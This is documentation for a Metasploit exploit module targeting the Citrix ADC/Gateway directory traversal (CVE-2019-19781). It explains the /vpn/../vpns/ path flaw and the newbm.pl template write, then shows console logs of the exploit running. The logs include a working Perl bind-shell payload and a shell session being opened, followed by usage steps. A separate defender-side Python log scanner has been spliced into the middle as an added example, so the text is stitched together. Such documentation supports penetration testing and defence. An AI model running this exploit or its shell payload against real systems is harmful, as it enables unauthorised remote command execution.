metasploit-gs/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md
2020-01-13 21:02:56 -06:00

Introduction

A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.

When the NSPPE receives a request for GET /vpn/index.html, it is supposed to forward the request to Apache, which processes it. However, when the request is GET /vpn/../vpns/ (whose path is not sanitized), Apache resolves the route to GET /vpns/ and processes that request normally.

This /vpns/ directory is interesting because it contains Perl code. The script newbm.pl creates an array containing information from several parameters, then calls the filewrite function, which writes the content to an XML file on disk.

An attacker can execute arbitrary commands remotely by writing a crafted XML file that embeds Perl Template Toolkit directives as part of the payload.
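
As an added defender-side example (not part of the module or of the original document), the following Python flags web-server access-log requests whose path contains a dot-dot segment that resolves under /vpns/, the routing gap described above, and notes when the resolved route reaches newbm.pl. The log lines, client addresses and file names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format), not taken from the page;
# line 2 mirrors the module's check request, lines 3-4 the write-then-fetch pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2020:20:50:01 -0600] "GET /vpn/index.html HTTP/1.1" 200 4821
10.0.0.9 - - [13/Jan/2020:20:50:12 -0600] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 1322
10.0.0.9 - - [13/Jan/2020:20:50:15 -0600] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 150
10.0.0.9 - - [13/Jan/2020:20:50:20 -0600] "GET /vpn/%2E%2E/vpns/portal/scripts/example.xml HTTP/1.1" 404 89
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")


def decoded_path(target: str) -> str:
    """Path component with percent-encoding removed twice (catches %252E double encoding)."""
    return unquote(unquote(urlsplit(target).path))


def canonical_path(target: str) -> str:
    """Collapse '..' the way backend route resolution does: /vpn/../vpns/x -> /vpns/x."""
    norm = posixpath.normpath(decoded_path(target))
    return norm if norm.startswith("/") else "/" + norm


def traverses_into_vpns(target: str) -> bool:
    """True when a raw dot-dot segment is present and the resolved route lands under /vpns/."""
    if not DOT_DOT.search(decoded_path(target)):
        return False  # a direct /vpns/ request is a different (weaker) signal
    norm = canonical_path(target)
    return norm == "/vpns" or norm.startswith("/vpns/")


def scan_access_log(log_text: str) -> list:
    """Return (ip, method, canonical_path, status, note) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not traverses_into_vpns(m["target"]):
            continue
        norm = canonical_path(m["target"])
        note = "traversal into /vpns/"
        if posixpath.basename(norm) == "newbm.pl":
            note += "; newbm.pl reached (template write stage)"
        hits.append((m["ip"], m["method"], norm, int(m["status"]), note))
    return hits
```

Matching on the canonicalised route rather than the literal string `/vpn/../vpns/` means encoded or nested variants of the same traversal are caught by the same rule.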

msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
[*] Generated payload: id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2

id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/linux/http/citrix_dir_traversal_rce
  4. Do: set RHOSTS [IP]
  5. Do: set LHOST [IP]
  6. Do: set VERBOSE true
  7. Do: run

Targets

Id  Name
--  ----
0   Python
1   Unix Command

Advanced options

ForceExploit

Override check result.

References

  1. https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/
  2. https://www.exploit-db.com/exploits/47901
  3. https://www.exploit-db.com/exploits/47902